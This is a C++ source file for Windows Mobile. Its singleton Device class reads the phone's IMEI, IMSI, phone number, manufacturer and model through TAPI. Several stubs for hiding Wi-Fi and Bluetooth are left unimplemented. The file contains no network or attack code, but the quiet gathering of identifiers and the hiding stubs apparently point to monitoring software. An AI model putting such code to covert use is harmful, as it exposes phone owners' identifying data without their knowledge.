#include <string>
#include <vector>
#include <exception>

using namespace std;

#include "Device.h"
#include <GetDeviceUniqueId.h>
#include <tapi.h>
#include <extapi.h>
#include <Winbase.h>

VOID FAR PASCAL DeviceLineCallbackFunc(DWORD hDevice, DWORD dwMsg, DWORD dwCallbackInstance, 
								 DWORD dwParam1, DWORD dwParam2, DWORD dwParam3) {
	BOOL bLogged = FALSE;
	return;
}

/**
* La nostra unica reference a Device.
*/
Device* Device::Instance = NULL;
volatile LONG Device::lLock = 0;

Device* Device::self() {
	while (InterlockedExchange((LPLONG)&lLock, 1) != 0)
		Sleep(1);

	if(Instance == NULL)
		Instance = new(std::nothrow) Device();

	InterlockedExchange((LPLONG)&lLock, 0);

	return Instance;
}

BOOL Device::GetOsVersion(OSVERSIONINFO* pVersionInfo) {
	WAIT_AND_SIGNAL(hDeviceMutex);

	ZeroMemory(pVersionInfo, sizeof(OSVERSIONINFO));
	pVersionInfo->dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

	if(GetVersionEx(pVersionInfo)) {
		UNLOCK(hDeviceMutex);
		return TRUE;
	}

	UNLOCK(hDeviceMutex);
	return FALSE;
}

BOOL Device::IsWiFiHidingSupported() {
	throw "Not yet implemented";
}

void Device::IsBTHidingSupported() {
	throw "Not yet implemented";
}

BOOL Device::IsWifi() {
	throw "Not yet implemented";
}

BOOL Device::IsBT() {
	throw "Not yet implemented";
}

BOOL Device::IsWiFiActivable() {
	throw "Not yet implemented";
}

BOOL Device::IsBTActivable() {
	throw "Not yet implemented";
}

const WCHAR* Device::GetImsi() {
	return wImsi;
}

const WCHAR* Device::GetImei() {
	return wImei;
}

const BYTE* Device::GetInstanceId() {
	return g_InstanceId;
}

const WCHAR* Device::GetPhoneNumber() {
	return wPhoneNumber;
}

const WCHAR* Device::GetManufacturer() {
	return wManufacturer;
}

const WCHAR* Device::GetModel() {
	return wModel;
}

BOOL Device::RefreshData() {
	DWORD            rc;
	LINEGENERALINFO LineGeneralInfo;
	HLINE hLine = NULL;
	HLINEAPP hApp;
	LINEEXTENSIONID extid;
	LINEADDRESSCAPS AddressCaps;
	DWORD dwMinVersion = 0x00010003;
	DWORD dwAPIVersion = TAPI_CURRENT_VERSION;

	WAIT_AND_SIGNAL(hDeviceMutex);

	// Inizializziamo le TAPI
	if(lineInitialize(&hApp, g_hInstance, DeviceLineCallbackFunc, NULL, &rc) < 0) {
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	// Definiamo una versione minima
	if(lineNegotiateAPIVersion(hApp, 0, dwMinVersion, dwAPIVersion, &dwAPIVersion, &extid) < 0) {
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	if(lineOpen(hApp, 0, &hLine, dwAPIVersion, 0, 0, LINECALLPRIVILEGE_NONE, 0, NULL) < 0) {
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	ZeroMemory(&LineGeneralInfo, sizeof(LineGeneralInfo));
	LineGeneralInfo.dwTotalSize = sizeof(LineGeneralInfo);

	if(lineGetGeneralInfo(hLine, &LineGeneralInfo) < 0){
		lineClose(hLine);
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	// Prendiamo il codice IMEI
	LINEGENERALINFO *lpBuffer = (LINEGENERALINFO *)new(std::nothrow) BYTE[LineGeneralInfo.dwNeededSize];

	if(lpBuffer == NULL){
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	ZeroMemory(lpBuffer, LineGeneralInfo.dwNeededSize);
	lpBuffer->dwTotalSize  = LineGeneralInfo.dwNeededSize;

	if(lineGetGeneralInfo(hLine, lpBuffer) < 0){
		delete[] lpBuffer;
		lineClose(hLine);
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	// Prendiamo l'IMEI
	if(wImei) {
		delete[] wImei;
		wImei = NULL;
	}

	if(lpBuffer->dwSerialNumberSize) {
		wImei = new(std::nothrow) WCHAR[lpBuffer->dwSerialNumberSize];

		if(wImei != NULL){
			ZeroMemory(wImei, lpBuffer->dwSerialNumberSize);
			memcpy(wImei, ((BYTE *)lpBuffer) + (lpBuffer->dwSerialNumberOffset), lpBuffer->dwSerialNumberSize);
		}
	}

	// Calcoliamo l'InstanceId (g_InstanceId contiene i raw bytes non la stringa ASCII dell'ID)
	DWORD cbLen = 20;
	ZeroMemory(g_InstanceId, 20);
	GetDeviceUniqueID(reinterpret_cast<PBYTE>(wImei), WideLen(wImei), GETDEVICEUNIQUEID_V1, g_InstanceId, &cbLen);

	// Richiediamo il numero di telefono
	ZeroMemory(&AddressCaps, sizeof(AddressCaps));
	AddressCaps.dwTotalSize = sizeof(AddressCaps);

	if(lineGetAddressCaps(hApp, 0, 0, dwAPIVersion, 0, &AddressCaps) < 0){
		delete[] lpBuffer;
		lineClose(hLine);
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	LINEADDRESSCAPS *lpLine = (LINEADDRESSCAPS *)new(std::nothrow) BYTE[AddressCaps.dwNeededSize];

	if(lpLine == NULL){
		delete[] lpBuffer;
		lineClose(hLine);
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	ZeroMemory(lpLine, AddressCaps.dwNeededSize);
	lpLine->dwTotalSize = AddressCaps.dwNeededSize;

	if(lineGetAddressCaps(hApp, 0, 0, dwAPIVersion, 0, lpLine) < 0){
		delete[] lpBuffer;
		delete[] lpLine;
		lineClose(hLine);
		UNLOCK(hDeviceMutex);
		return FALSE;
	}

	lineClose(hLine);

	if(wManufacturer) {
		delete[] wManufacturer;
		wManufacturer = NULL;
	}

	if(lpBuffer->dwManufacturerSize){
		wManufacturer = new(std::nothrow) WCHAR[lpBuffer->dwManufacturerSize];

		if(wManufacturer != NULL){
			ZeroMemory(wManufacturer, lpBuffer->dwManufacturerSize);
			memcpy(wManufacturer, ((BYTE *)lpBuffer) + (lpBuffer->dwManufacturerOffset), lpBuffer->dwManufacturerSize);
		}
	}

	// Prendiamo il nome del modello
	if(wModel) {
		delete[] wModel;
		wModel = NULL;
	}

	if(lpBuffer->dwModelSize){
		wModel = new(std::nothrow) WCHAR[lpBuffer->dwModelSize];

		if(wModel != NULL){
			ZeroMemory(wModel, lpBuffer->dwModelSize);
			memcpy(wModel, ((BYTE *)lpBuffer) + (lpBuffer->dwModelOffset), lpBuffer->dwModelSize);
		}
	}

	// Prendiamo il numero della linea
	if(wImsi) {
		delete[] wImsi;
		wImsi = NULL;
	}

	if(lpBuffer->dwSubscriberNumberSize){
		wImsi = new(std::nothrow) WCHAR[lpBuffer->dwSubscriberNumberSize];

		if(wImsi != NULL) {
			ZeroMemory(wImsi, lpBuffer->dwSubscriberNumberSize);
			memcpy(wImsi, ((BYTE *)lpBuffer) + (lpBuffer->dwSubscriberNumberOffset), lpBuffer->dwSubscriberNumberSize);
		}
	}

	// Prendiamo il numero di telefono
	if(wPhoneNumber) {
		delete[] wPhoneNumber;
		wPhoneNumber = NULL;
	}

	if(lpLine->dwAddressSize){
		wPhoneNumber = new(std::nothrow) WCHAR[lpLine->dwAddressSize];

		if(wPhoneNumber != NULL) {
			ZeroMemory(wPhoneNumber, lpLine->dwAddressSize);
			memcpy(wPhoneNumber, ((BYTE *)lpLine) + lpLine->dwAddressOffset, lpLine->dwAddressSize);
		}
	}

	if(lpLine)
		delete[] lpLine;

	if(lpBuffer)
		delete[] lpBuffer;

	UNLOCK(hDeviceMutex);
	return TRUE;
}

Device::Device() : wImei(NULL), wImsi(NULL), wInstanceId(NULL), wPhoneNumber(NULL), wManufacturer(NULL), 
wModel(NULL), hDeviceMutex(INVALID_HANDLE_VALUE) {
	hDeviceMutex = CreateMutex(NULL, FALSE, NULL);
}

Device::~Device() {
	if(wImei)
		delete[] wImei;

	if(wImsi)
		delete[] wImsi;

	if(wInstanceId)
		delete[] wInstanceId;

	if(wPhoneNumber)
		delete[] wPhoneNumber;

	if(wManufacturer)
		delete[] wManufacturer;

	if(wModel)
		delete[] wModel;

	if(hDeviceMutex != INVALID_HANDLE_VALUE)
		CloseHandle(hDeviceMutex);
}


